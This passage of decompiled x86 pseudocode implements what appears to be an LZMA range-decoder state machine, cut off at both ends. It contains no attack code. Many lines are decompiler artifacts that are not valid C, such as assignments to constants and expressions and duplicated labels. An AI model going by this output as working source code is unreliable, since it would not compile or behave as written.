                                                            													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            													 *(_t613 - 0x40) = 1;
                                                            													_t532 = _t531 - (_t531 >> 5);
                                                            													 *_t606 = _t532;
                                                            												} else {
                                                            													 *(_t613 - 0x10) = _t565;
                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                            												}
                                                            												if( *(_t613 - 0x10) >= 0x1000000) {
                                                            													goto L139;
                                                            												}
                                                            											case 5:
                                                            												goto L137;
                                                            											case 6:
                                                            												__edx = 0;
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x34) = 1;
                                                            													 *(__ebp - 0x84) = 7;
                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            													while(1) {
                                                            														L132:
                                                            														 *(_t613 - 0x54) = _t606;
                                                            														goto L133;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            												__esi =  *(__ebp - 0x60);
                                                            												__cl = 8;
                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            												__ecx =  *(__ebp - 0x3c);
                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            												__ecx =  *(__ebp - 4);
                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            												__eflags =  *(__ebp - 0x38) - 4;
                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            												if( *(__ebp - 0x38) >= 4) {
                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                            														_t98 = __ebp - 0x38;
                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                            														__eflags =  *_t98;
                                                            													} else {
                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            													}
                                                            												} else {
                                                            													 *(__ebp - 0x38) = 0;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                            												if( *(__ebp - 0x34) == __edx) {
                                                            													__ebx = 0;
                                                            													__ebx = 1;
                                                            													goto L61;
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x14);
                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                            														__eflags = __eax;
                                                            													}
                                                            													__ecx =  *(__ebp - 8);
                                                            													__ebx = 0;
                                                            													__ebx = 1;
                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            													goto L41;
                                                            												}
                                                            											case 7:
                                                            												__eflags =  *(__ebp - 0x40) - 1;
                                                            												if( *(__ebp - 0x40) != 1) {
                                                            													__eax =  *(__ebp - 0x24);
                                                            													 *(__ebp - 0x80) = 0x16;
                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            													__eax =  *(__ebp - 0x28);
                                                            													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            													__eax =  *(__ebp - 0x2c);
                                                            													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            													__eax = 0;
                                                            													__eflags =  *(__ebp - 0x38) - 7;
                                                            													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            													__al = __al & 0x000000fd;
                                                            													__eax = (__eflags >= 0) - 1 + 0xa;
                                                            													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            													__eax =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 4) + 0x664;
                                                            													__eflags = __eax;
                                                            													 *(__ebp - 0x58) = __eax;
                                                            													goto L69;
                                                            												}
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 8;
                                                            												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            												while(1) {
                                                            													L132:
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
                                                            											case 8:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 4);
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x84) = 0xa;
                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x38);
                                                            													__ecx =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                            													 *(__ebp - 0x84) = 9;
                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            												}
                                                            												while(1) {
                                                            													L132:
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
                                                            											case 9:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													goto L89;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x60);
                                                            												if( *(__ebp - 0x60) == 0) {
                                                            													goto L171;
                                                            												}
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                            												__eflags = _t259;
                                                            												0 | _t259 = _t259 + _t259 + 9;
                                                            												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                            												goto L76;
                                                            											case 0xa:
                                                            												goto L0;
                                                            											case 0xb:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__ecx =  *(__ebp - 0x24);
                                                            													__eax =  *(__ebp - 0x20);
                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												} else {
                                                            													__eax =  *(__ebp - 0x24);
                                                            												}
                                                            												__ecx =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												goto L88;
                                                            											case 0xc:
                                                            												L99:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xc;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t334 = __ebp - 0x70;
                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t334;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												goto L101;
                                                            											case 0xd:
                                                            												L37:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xd;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t122 = __ebp - 0x70;
                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t122;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L39:
                                                            												__eax =  *(__ebp - 0x40);
                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            													goto L48;
                                                            												}
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													goto L54;
                                                            												}
                                                            												L41:
                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            												 *(__ebp - 0x48) = __eax;
                                                            												__eax = __eax + 1;
                                                            												__eax = __eax << 8;
                                                            												__eax = __eax + __ebx;
                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edx = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													 *(__ebp - 0x40) = 1;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													__ebx = __ebx + __ebx + 1;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edx;
                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L39;
                                                            												} else {
                                                            													goto L37;
                                                            												}
                                                            											case 0xe:
                                                            												L46:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xe;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t156 = __ebp - 0x70;
                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t156;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												while(1) {
                                                            													L48:
                                                            													__eflags = __ebx - 0x100;
                                                            													if(__ebx >= 0x100) {
                                                            														break;
                                                            													}
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__edx = __ebx + __ebx;
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													__esi = __edx + __eax;
                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            													__ax =  *__esi;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__edi = __ax & 0x0000ffff;
                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            														__cx = __ax;
                                                            														_t170 = __edx + 1; // 0x1
                                                            														__ebx = _t170;
                                                            														__cx = __ax >> 5;
                                                            														__eflags = __eax;
                                                            														 *__esi = __ax;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __ecx;
                                                            														0x800 = 0x800 - __edi;
                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            														__ebx = __ebx + __ebx;
                                                            														 *__esi = __cx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														continue;
                                                            													} else {
                                                            														goto L46;
                                                            													}
                                                            												}
                                                            												L54:
                                                            												_t173 = __ebp - 0x34;
                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            												__eflags =  *_t173;
                                                            												goto L55;
                                                            											case 0xf:
                                                            												L58:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0xf;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t203 = __ebp - 0x70;
                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t203;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L60:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													L55:
                                                            													__al =  *(__ebp - 0x44);
                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            													goto L56;
                                                            												}
                                                            												L61:
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t217 = __edx + 1; // 0x1
                                                            													__ebx = _t217;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L60;
                                                            												} else {
                                                            													goto L58;
                                                            												}
                                                            											case 0x10:
                                                            												L109:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0x10;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t365 = __ebp - 0x70;
                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t365;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												goto L111;
                                                            											case 0x11:
                                                            												goto L69;
                                                            											case 0x12:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													__eax =  *(__ebp - 0x58);
                                                            													 *(__ebp - 0x84) = 0x13;
                                                            													__esi =  *(__ebp - 0x58) + 2;
                                                            													while(1) {
                                                            														L132:
                                                            														 *(_t613 - 0x54) = _t606;
                                                            														goto L133;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x4c);
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                            												__eflags = __eax;
                                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            												goto L130;
                                                            											case 0x13:
                                                            												__eflags =  *(__ebp - 0x40);
                                                            												if( *(__ebp - 0x40) != 0) {
                                                            													_t469 = __ebp - 0x58;
                                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            													__eflags =  *_t469;
                                                            													 *(__ebp - 0x30) = 0x10;
                                                            													 *(__ebp - 0x40) = 8;
                                                            													L144:
                                                            													 *(__ebp - 0x7c) = 0x14;
                                                            													goto L145;
                                                            												}
                                                            												__eax =  *(__ebp - 0x4c);
                                                            												__ecx =  *(__ebp - 0x58);
                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                            												 *(__ebp - 0x30) = 8;
                                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            												L130:
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												 *(__ebp - 0x40) = 3;
                                                            												goto L144;
                                                            											case 0x14:
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            												__eax =  *(__ebp - 0x80);
                                                            												 *(_t613 - 0x88) = _t533;
                                                            												goto L1;
                                                            											case 0x15:
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            												goto L120;
                                                            											case 0x16:
                                                            												__eax =  *(__ebp - 0x30);
                                                            												__eflags = __eax - 4;
                                                            												if(__eax >= 4) {
                                                            													_push(3);
                                                            													_pop(__eax);
                                                            												}
                                                            												__ecx =  *(__ebp - 4);
                                                            												 *(__ebp - 0x40) = 6;
                                                            												__eax = __eax << 7;
                                                            												 *(__ebp - 0x7c) = 0x19;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L145;
                                                            											case 0x17:
                                                            												L145:
                                                            												__eax =  *(__ebp - 0x40);
                                                            												 *(__ebp - 0x50) = 1;
                                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            												goto L149;
                                                            											case 0x18:
                                                            												L146:
                                                            												__eflags =  *(__ebp - 0x6c);
                                                            												if( *(__ebp - 0x6c) == 0) {
                                                            													 *(__ebp - 0x88) = 0x18;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x70);
                                                            												__eax =  *(__ebp - 0xc);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												_t484 = __ebp - 0x70;
                                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                                            												__eflags =  *_t484;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            												L148:
                                                            												_t487 = __ebp - 0x48;
                                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                                            												__eflags =  *_t487;
                                                            												L149:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													__ecx =  *(__ebp - 0x40);
                                                            													__ebx =  *(__ebp - 0x50);
                                                            													0 = 1;
                                                            													__eax = 1 << __cl;
                                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            													__eax =  *(__ebp - 0x7c);
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													while(1) {
                                                            														 *(_t613 - 0x88) = _t533;
                                                            														goto L1;
                                                            													}
                                                            												}
                                                            												__eax =  *(__ebp - 0x50);
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__esi = __edx + __eax;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__ax =  *__esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													__cx = __ax >> 5;
                                                            													__eax = __eax - __ecx;
                                                            													__edx = __edx + 1;
                                                            													__eflags = __edx;
                                                            													 *__esi = __ax;
                                                            													 *(__ebp - 0x50) = __edx;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													goto L148;
                                                            												} else {
                                                            													goto L146;
                                                            												}
                                                            											case 0x19:
                                                            												__eflags = __ebx - 4;
                                                            												if(__ebx < 4) {
                                                            													 *(__ebp - 0x2c) = __ebx;
                                                            													L119:
                                                            													_t393 = __ebp - 0x2c;
                                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            													__eflags =  *_t393;
                                                            													L120:
                                                            													__eax =  *(__ebp - 0x2c);
                                                            													__eflags = __eax;
                                                            													if(__eax == 0) {
                                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            														goto L170;
                                                            													}
                                                            													__eflags = __eax -  *(__ebp - 0x60);
                                                            													if(__eax >  *(__ebp - 0x60)) {
                                                            														goto L171;
                                                            													}
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            													__eax =  *(__ebp - 0x30);
                                                            													_t400 = __ebp - 0x60;
                                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            													__eflags =  *_t400;
                                                            													goto L123;
                                                            												}
                                                            												__ecx = __ebx;
                                                            												__eax = __ebx;
                                                            												__ecx = __ebx >> 1;
                                                            												__eax = __ebx & 0x00000001;
                                                            												__ecx = (__ebx >> 1) - 1;
                                                            												__al = __al | 0x00000002;
                                                            												__eax = (__ebx & 0x00000001) << __cl;
                                                            												__eflags = __ebx - 0xe;
                                                            												 *(__ebp - 0x2c) = __eax;
                                                            												if(__ebx >= 0xe) {
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x48) = __ecx;
                                                            													L102:
                                                            													__eflags =  *(__ebp - 0x48);
                                                            													if( *(__ebp - 0x48) <= 0) {
                                                            														__eax = __eax + __ebx;
                                                            														 *(__ebp - 0x40) = 4;
                                                            														 *(__ebp - 0x2c) = __eax;
                                                            														__eax =  *(__ebp - 4);
                                                            														__eax =  *(__ebp - 4) + 0x644;
                                                            														__eflags = __eax;
                                                            														L108:
                                                            														__ebx = 0;
                                                            														 *(__ebp - 0x58) = __eax;
                                                            														 *(__ebp - 0x50) = 1;
                                                            														 *(__ebp - 0x44) = 0;
                                                            														 *(__ebp - 0x48) = 0;
                                                            														L112:
                                                            														__eax =  *(__ebp - 0x40);
                                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            															_t391 = __ebp - 0x2c;
                                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            															__eflags =  *_t391;
                                                            															goto L119;
                                                            														}
                                                            														__eax =  *(__ebp - 0x50);
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            														__eax =  *(__ebp - 0x58);
                                                            														__esi = __edi + __eax;
                                                            														 *(__ebp - 0x54) = __esi;
                                                            														__ax =  *__esi;
                                                            														__ecx = __ax & 0x0000ffff;
                                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                                            														if( *(__ebp - 0xc) >= __edx) {
                                                            															__ecx = 0;
                                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            															__ecx = 1;
                                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            															__ebx = 1;
                                                            															__ecx =  *(__ebp - 0x48);
                                                            															__ebx = 1 << __cl;
                                                            															__ecx = 1 << __cl;
                                                            															__ebx =  *(__ebp - 0x44);
                                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                                            															__cx = __ax;
                                                            															__cx = __ax >> 5;
                                                            															__eax = __eax - __ecx;
                                                            															__edi = __edi + 1;
                                                            															__eflags = __edi;
                                                            															 *(__ebp - 0x44) = __ebx;
                                                            															 *__esi = __ax;
                                                            															 *(__ebp - 0x50) = __edi;
                                                            														} else {
                                                            															 *(__ebp - 0x10) = __edx;
                                                            															0x800 = 0x800 - __ecx;
                                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            															 *__esi = __dx;
                                                            														}
                                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                                            															L111:
                                                            															_t368 = __ebp - 0x48;
                                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                                            															__eflags =  *_t368;
                                                            															goto L112;
                                                            														} else {
                                                            															goto L109;
                                                            														}
                                                            													}
                                                            													__ecx =  *(__ebp - 0xc);
                                                            													__ebx = __ebx + __ebx;
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            														__ecx =  *(__ebp - 0x10);
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            														__ebx = __ebx | 0x00000001;
                                                            														__eflags = __ebx;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
